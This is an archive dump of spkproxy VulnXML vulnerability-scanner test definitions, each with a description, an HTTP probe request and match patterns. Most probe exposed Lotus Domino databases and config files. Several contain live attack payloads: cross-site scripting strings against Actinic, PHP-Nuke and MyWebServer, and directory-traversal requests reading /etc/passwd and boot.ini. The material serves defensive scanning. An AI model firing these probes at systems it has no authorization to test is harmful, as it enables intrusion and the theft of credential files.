how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1494.xml0100664000076500007650000000707307566204543017655 0ustar davedave (database.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /database.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1495.xml0100664000076500007650000000706707566204543017661 0ustar davedave (domcfg.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /domcfg.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1496.xml0100664000076500007650000000706607566204543017661 0ustar davedave (domlog.nsf) "The domain server logs can be accessed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /domlog.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1497.xml0100664000076500007650000000706007566204543017654 0ustar davedave (events4.nsf) "The events log can be accessed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /events4.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1498.xml0100664000076500007650000000704607566204543017661 0ustar davedave (log.nsf) "The server log is remotely accessible." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /log.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1499.xml0100664000076500007650000000706107566204543017657 0ustar davedave (mab.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mab.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-149.xml0100664000076500007650000000755107566204543017572 0ustar davedave (ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script>) "Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1500.xml0100664000076500007650000000706707566204543017644 0ustar davedave (mail.box) "The mail database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mail.box HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1501.xml0100664000076500007650000000707107566204543017640 0ustar davedave (mailw46.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /mailw46.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1502.xml0100664000076500007650000000712407566204543017640 0ustar davedave (names.nsf) "User names and groups can be accessed remotely (possibly password hashes a well)" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /names.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1503.xml0100664000076500007650000000707107566204543017642 0ustar davedave (ntsync4.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ntsync4.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1504.xml0100664000076500007650000000711707566204543017644 0ustar davedave (open?) "The Lotus server allows directory browsing by putting ?open after a directory name." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /open? HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1505.xml0100664000076500007650000000704707566204543017647 0ustar davedave (setup.nsf) "The server can be configured remotely 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /setup.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1506.xml0100664000076500007650000000707507566204543017651 0ustar davedave (statrep.nsf) "Any reports generated by the admins can be retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /statrep.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1507.xml0100664000076500007650000000706507566204543017651 0ustar davedave (today.nsf) "This database can be read without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /today.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1508.xml0100664000076500007650000000707507566204543017653 0ustar davedave (webadmin.nsf) "The server admin database can be accessed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /webadmin.nsf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1509.xml0100664000076500007650000000722307566204543017647 0ustar davedave (testing_whatever) "The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/testing_whatever HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ domino/cgi-bin 200 domino/cgi-bin 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-150.xml0100664000076500007650000001011707566204543017552 0ustar davedave (comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview) "This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} <script>alert\('Vulnerable'\)</script> spkproxy/VulnXML/SiteTests/sitetest-1513.xml0100664000076500007650000000715007566204543017641 0ustar davedave (LOGIN.PWD) "MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /LOGIN.PWD HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1514.xml0100664000076500007650000000713207566204543017642 0ustar davedave (CONFIG.AP) "MIPCD configuration information. MIPCD should not have the web interface enabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /USER/CONFIG.AP HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1515.xml0100664000076500007650000000712007566204543017640 0ustar davedave (.../.../.../) "The myCIO server allows directory traversal." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.../.../.../ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Last Modified 200 Last Modified 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1516.xml0100664000076500007650000000752407566204543017651 0ustar davedave (JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--) "MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//-- HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1517.xml0100664000076500007650000000734407566204543017652 0ustar davedave (HandleSearch.html?searchTarget=test&B1=Submit) "MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /MWS/HandleSearch.html?searchTarget=test&B1=Submit HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-151.xml0100664000076500007650000000746507566204543017567 0ustar davedave (ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>) "Actinic E-Commerce services is vulnerable to to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-152.xml0100664000076500007650000000727607566204543017570 0ustar davedave ([SecCheck]/..%252f..%252f../ext.ini) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /[SecCheck]/..%252f..%252f../ext.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1534.xml0100664000076500007650000000711407566204543017644 0ustar davedave () "Fasttrack can give a directory listing if issued 'get' instead of 'GET'." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET / HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1535.xml0100664000076500007650000000715207566204543017647 0ustar davedave () "Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET / HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1536.xml0100664000076500007650000000704607566204543017652 0ustar davedave (.nsconfig) "Contains authorization information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.nsconfig HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1537.xml0100664000076500007650000000704307566204543017650 0ustar davedave (.perf) "Contains server performance information" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.perf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1538.xml0100664000076500007650000000712107566204543017646 0ustar davedave (?PageServices) "Server allows directory indexing with ?PageServices" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?PageServices HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1539.xml0100664000076500007650000000720107566204543017646 0ustar davedave (?wp-cs-dump) "The remote server may allow directory listings through Web Publisher. Web Publisher should be disabled." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?wp-cs-dump HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Index of 200 Index of 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-153.xml0100664000076500007650000000727607566204543017571 0ustar davedave ([SecCheck]/..%255c..%255c../ext.ini) "BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /[SecCheck]/..%255c..%255c../ext.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1540.xml0100664000076500007650000000703007566204543017636 0ustar davedave (publisher/) "Netscape Publisher" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /publisher/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1541.xml0100664000076500007650000000733607566204543017650 0ustar davedave (search) "Netscape search for iPlanet versions 4.1 lower than SP 10 and iPlanet 6 lower than SP 3 are vulnerable to a buffer overflow. Search is enabled on this server but the BO could not be confirmed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ search-ui/applet 200 search-ui/applet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1542.xml0100664000076500007650000000735707566204543017654 0ustar davedave (search?NS-query-pat=../../../../../../../../../../etc/passwd) "The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search?NS-query-pat=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1543.xml0100664000076500007650000000736507566204543017654 0ustar davedave (search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini) "The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 